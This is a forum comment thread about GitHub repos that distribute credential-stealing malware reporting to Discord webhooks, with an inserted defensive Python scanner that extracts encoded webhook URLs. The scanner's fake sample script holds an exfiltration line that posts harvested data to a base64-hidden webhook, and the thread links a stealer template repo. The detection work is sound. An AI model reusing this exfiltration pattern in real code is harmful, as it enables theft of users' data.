
These repos post to Discord webhooks to notify of newly compromised systems.

I’ve found Discord to be responsive to abuse complaints in the past. If someone wrote a simple script to download these repos and extract the Discord webhook links I bet you could get Discord to shut down their accounts.

In my past experience Discord was aggressive about this, going so far as to ban the accounts of people who had participated on those servers with clearly illegal purposes. They’ll come back and make new accounts again, of course, but having them lose all of their connected servers, history, and requiring them to update every single one of their malware drops should slow them down considerably.



> going so far as to ban the accounts

The responsible thing would also be to release all related data, including personal information (IP addresses, emails, list of contacts, chat logs), to the investigation (police, etc.)


I’m sure they report serious crimes and at least retain records for questionable activity.

I don’t get visibility into internal Discord operations, though. We just see that the perpetrators lost both their Discord server and their accounts disappeared from other Discords they were in. They angrily returned later with new usernames.


> I’m sure they report serious crimes and at least retain records for questionable activity.

Why are you sure? I really doubt it.


That would be a tremendous amount of work, at best they might be forwarding it to some CERT. But I doubt even that. Shutting down the accounts is probably the best they can do.


Doesn't really matter if the scammers are in Bumfuck, Egypt (literally)


Law enforcement has ways to work across borders (international agreements, etc).

Such mechanisms should and will improve with time.

If a country doesn't provide legal support against scammers, then the requesting country can reciprocate: declare a green light for scammers against the refusing country.


We could lock such repos. No access (not even read-only) and disable accounts. That could also be semi automatic.


Let's shut down Discord instead, for the good of all mankind.


> extract the Discord webhook links

there's a large variety of malware, they don't all phone home the same way and they don't all phone home to discord


Did you read the linked article? The template they’re duplicating phones home via Discord.

I’m not saying every malware uses Discord. I’m talking about the article.


i did, in fact, read the article. you said "a simple script to download these repos". the variety of malware would make the script not so simple, and not so effective.


> the variety of malware would make the script not so simple, and not so effective.

The article is about using scripts to identify and download the malware. They identified over 1000 matching repos, which would contain Discord webhooks in the script.

Scanning and identifying has already been done. That’s literally what the article is about.

It’s right in the second paragraph:

> As soon as you download and launch any of these, all the data from your computer is collected and sent to some discord server


yes, they identified spammy repos. you'd also need to identify which repos belong to which spammer groups, it's not just one person doing this (as mentioned in the article) -> they don't use the same malware. saying "sent to some discord server" is like saying "playing games on my nintendo". the malware is also obfuscated (as mentioned in the article) which makes identifying the home server harder with static analysis.

why don't we just send bad people to jail?


The web hook is in the templated script

From the article:

> The "trust" value, when base64-decoded, turns out to be a discord webhook link: myhook = 'https://discord.com/api/webhooks/1050437982584324138/VJByvmB...'

Collect all the scripts matching the template. Extract the “trust” variable. Decode base64. Send to Discord with proof of how it was obtained.

Discord then identifies the Discords matching those webhooks.

It’s not some hard static analysis problem. These are python scripts with a base64 encoded variable. I don’t understand why you’re making it out to be something other than what the article says.

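As an added example, not code from the article, the template repo, or any commenter: a Python scanner that implements the extraction step described in the comment above and generalises it slightly. Instead of reading only the `trust` variable, it checks every string literal in a script as-is and after peeling up to five base64 layers, and reports any Discord webhook URL it finds, so a renamed variable or a base64-of-base64 blob is still caught. The sample `main.py` text, the webhook URL in it, and the helper names (`extract_webhooks`, `scan_repos`, `redact`) are all constructed here and are not real; the variable names `love`/`trust`/`joy` are the ones the thread mentions.

```python
import base64
import binascii
import re
from typing import Dict, List

# Discord webhook URL: numeric snowflake id, then an opaque token.
WEBHOOK_RE = re.compile(
    r"https://discord(?:app)?\.com/api/webhooks/(\d+)/([A-Za-z0-9_-]+)"
)
# Any single-line, single- or double-quoted Python string literal.
STRING_RE = re.compile(r"""(['"])((?:\\.|(?!\1).)*?)\1""")
# A base64-alphabet run long enough to be worth decoding; shorter runs are noise.
B64_RE = re.compile(r"^[A-Za-z0-9+/=]{24,}$")


def decode_b64_layers(blob: str, max_layers: int = 5) -> List[str]:
    """Peel successive base64 layers off blob, returning each decoded text.

    Stops at the first layer that is not valid base64 or not valid UTF-8.
    Base64-of-base64 is cheap for a malware author to add, so a single layer
    is not assumed.
    """
    layers: List[str] = []
    current = blob.strip()
    for _ in range(max_layers):
        if not B64_RE.match(current):
            break
        padded = current + "=" * (-len(current) % 4)  # tolerate stripped padding
        try:
            decoded = base64.b64decode(padded).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            break
        layers.append(decoded)
        current = decoded.strip()
    return layers


def extract_webhooks(source: str) -> List[str]:
    """Return unique Discord webhook URLs found in one Python source file.

    Every string literal is checked as-is and after base64 decoding, so the
    variable name ('trust' in the template) does not matter.
    """
    found: List[str] = []
    for match in STRING_RE.finditer(source):
        literal = match.group(2)
        for text in [literal, *decode_b64_layers(literal)]:
            for hook in WEBHOOK_RE.finditer(text):
                url = hook.group(0)
                if url not in found:
                    found.append(url)
    return found


def scan_repos(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each path that contains a webhook to the webhooks it contains."""
    results: Dict[str, List[str]] = {}
    for path, source in files.items():
        hooks = extract_webhooks(source)
        if hooks:
            results[path] = hooks
    return results


def redact(url: str) -> str:
    """Keep the webhook id (what an abuse report needs) but hide most of the token."""
    return WEBHOOK_RE.sub(
        lambda m: f"https://discord.com/api/webhooks/{m.group(1)}/{m.group(2)[:4]}...",
        url,
    )


# Constructed sample: a fake webhook and a fake main.py shaped like the
# template (base64 in 'trust', plus a decoy and a double-encoded copy).
SAMPLE_WEBHOOK = (
    "https://discord.com/api/webhooks/000000000000000000/EXAMPLE_TOKEN_NOT_A_REAL_WEBHOOK"
)
_ONCE = base64.b64encode(SAMPLE_WEBHOOK.encode()).decode()
_TWICE = base64.b64encode(_ONCE.encode()).decode()
SAMPLE_MAIN_PY = (
    "import base64, requests\n"
    "love = 'dGhpcyBpcyBub3QgYSB3ZWJob29r'  # decoy, decodes to harmless text\n"
    f"trust = '{_ONCE}'\n"
    f'joy = "{_TWICE}"\n'
    "def send(data):\n"
    "    requests.post(base64.b64decode(trust), data=data)\n"
)

if __name__ == "__main__":
    # In practice 'files' would hold the main.py of every repo the search found.
    files = {"repo-a/main.py": SAMPLE_MAIN_PY, "repo-b/main.py": "print('hello')\n"}
    for path, hooks in scan_repos(files).items():
        for url in hooks:
            print(f"{path}: {redact(url)}")
```

Static string scanning like this only works on the plain-Python variants; a script packed with PyArmor or compiled with Nuitka would have to be unpacked or run in a sandbox with network capture first, which is the objection raised further down the thread.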

the article details how github is spammed by multiple people who read one guide. not every single one of the 1000 repos is THE SAME breed of malware. some overlap, maybe. but some is c#, some is rust, some is python. out of those that are python, some are obfuscated with this love/trust/joy obfuscator, some use pyarmor, some are compiled with nuitka. no, the guide does not instruct you which malware strain to use, only how to game github for traffic.

if it was that simple it would be a solved problem. i encourage you to give it a shot


> not every single one of the 1000 repos is THE SAME breed of malware. some overlap, maybe. but some is c#, some is rust, some is python

No, the article is specifically about 1115 malware repos built from the same template

This is taken from the intro of the article:

> Wrote a script that helped me find 1115 repositories built based on the instructions from the guide.

I don’t know what you think you’re talking about, but you’re not talking about the article that I’m talking about.

The template repo is here: https://github.com/Jalynn0922/steal-cook

It contains the main.py script that the article is talking about.


NOT the same malware template. article only details how "This first repo I found" works, not all of them. look at how his github searching script works in "Scraping Github" - there is no way to determine what malware is in the repo, only that it is doing keyword stuffing.


...why? what's the difference between "POST payload to discord webhook" vs. "POST payload to VPS rented anonymously"? it seems like an inexplicably bad decision to use a proprietary US service for your malware C&C


These are not sophisticated attackers.

Discord is free and easy. The notification pops up right where they’re already chatting with each other for 16 hours every single day.

Renting a VPS and writing custom software to accept a POST request requires a credit card, programming skill, and time.


These are not high-effort malware distributors. It's very low-hanging fruit done by script kiddies, essentially.



